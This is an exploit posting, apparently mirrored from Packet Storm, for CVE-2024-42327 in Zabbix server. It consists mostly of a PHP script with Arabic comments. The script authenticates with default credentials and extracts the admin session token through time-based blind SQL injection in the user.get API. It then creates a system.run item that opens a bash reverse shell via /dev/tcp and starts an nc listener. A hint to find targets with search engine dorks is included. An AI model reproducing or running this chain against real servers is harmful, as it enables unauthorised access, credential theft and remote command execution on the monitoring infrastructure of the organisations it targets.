Share
## https://sploitus.com/exploit?id=PACKETSTORM:189549
=============================================================================================================================================
| # Title : Zabbix server v 7.0.1rc1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.zabbix.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description:
The following code exploits the CVE-2024-42327 vulnerability, performs identity verification,
leaks the API token, and then sends code to reverse the shell
[+] save code as poc.php .
[+] Set Target : line 141
[+] USage : C:\www>php 2.php
[+] PayLoad :
<?php
// المكتبات المطلوبة
$headers = [
"Content-Type: application/json",
"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
];
function zabbixAuthenticate($url, $username, $password)
{
$data = json_encode([
"jsonrpc" => "2.0",
"method" => "user.login",
"params" => [
"username" => $username,
"password" => $password
],
"id" => 1
]);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
$responseJson = json_decode($response, true);
if (isset($responseJson['result'])) {
echo "[+] تم تسجيل الدخول بنجاح! التوكن API: " . $responseJson['result'] . "\n";
return $responseJson['result'];
} else {
echo "[-] فشل تسجيل الدخول. الاستجابة: " . $response . "\n";
exit();
}
}
function sendInjection($url, $authToken, $position, $char, $sleepTime, $row)
{
$data = json_encode([
"jsonrpc" => "2.0",
"method" => "user.get",
"params" => [
"output" => ["userid", "username"],
"selectRole" => [
"roleid",
"name AND (SELECT * FROM (SELECT(SLEEP($sleepTime - (IF(ORD(MID((SELECT sessionid FROM zabbix.sessions WHERE userid=1 and status=0 LIMIT $row,1), $position, 1))=" . ord($char) . ", 0, $sleepTime)))))BEEF)"
],
"editable" => 1,
],
"auth" => $authToken,
"id" => 1
]);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
function extractApiToken($url, $authToken, $position, $charset, $sleepTime)
{
foreach (str_split($charset) as $char) {
$response = sendInjection($url, $authToken, $position, $char, $sleepTime, 0);
$responseTime = substr($response, -5); // محاكاة التعامل مع التأخير
if ($sleepTime < $responseTime && $responseTime < $sleepTime + 0.5) {
return $char;
}
}
return null;
}
function getHostIds($url, $apiTokenAdmin)
{
$data = json_encode([
"jsonrpc" => "2.0",
"method" => "host.get",
"params" => [
"output" => ["hostid", "host"],
"selectInterfaces" => ["interfaceid"]
],
"auth" => $apiTokenAdmin,
"id" => 1
]);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
$responseJson = json_decode($response, true);
if (isset($responseJson['result'][0])) {
$hostId = $responseJson['result'][0]['hostid'];
$interfaceId = $responseJson['result'][0]['interfaces'][0]['interfaceid'];
return [$hostId, $interfaceId];
} else {
echo "[-] لم يتم العثور على أجهزة في الاستجابة.\n";
return [null, null];
}
}
function sendReverseShellRequest($url, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort)
{
$data = json_encode([
"jsonrpc" => "2.0",
"method" => "item.create",
"params" => [
"name" => "rce",
"key_" => "system.run[bash -c \"bash -i >& /dev/tcp/$listenIp/$listenPort 0>&1\"]",
"delay" => 1,
"hostid" => $hostId,
"type" => 0,
"value_type" => 1,
"interfaceid" => $interfaceId,
],
"auth" => $apiTokenAdmin,
"id" => 1
]);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $GLOBALS['headers']);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_exec($ch);
curl_close($ch);
}
$zabbixUrl = "http://example.com/api_jsonrpc.php";
$username = "admin";
$password = "admin";
$listenIp = "tun0";
$listenPort = 4444;
$threads = 10;
$sleepTime = 1;
$row = 0;
$length = 32;
$charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
$proxy = null; // استخدم NULL إذا لم يكن هناك وكيل
// بدء العملية
$apiToken = zabbixAuthenticate($zabbixUrl, $username, $password);
$apiTokenAdmin = '';
for ($position = 0; $position < $length; $position++) {
$char = extractApiToken($zabbixUrl, $apiToken, $position, $charset, $sleepTime);
if ($char !== null) {
$apiTokenAdmin .= $char;
echo "\r[*] استخراج التوكن API للمسؤول: " . $apiTokenAdmin;
flush();
}
}
echo "\n[*] الحصول على معرّفات الأجهزة ...\n";
list($hostId, $interfaceId) = getHostIds($zabbixUrl, $apiTokenAdmin);
if ($hostId && $interfaceId) {
echo "[*] بدء الاستماع وإرسال الـ reverse shell ...\n";
sendReverseShellRequest($zabbixUrl, $apiTokenAdmin, $hostId, $interfaceId, $listenIp, $listenPort);
shell_exec("nc -lnvp $listenPort");
} else {
echo "[-] فشل الحصول على معرّف الجهاز أو الواجهة.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================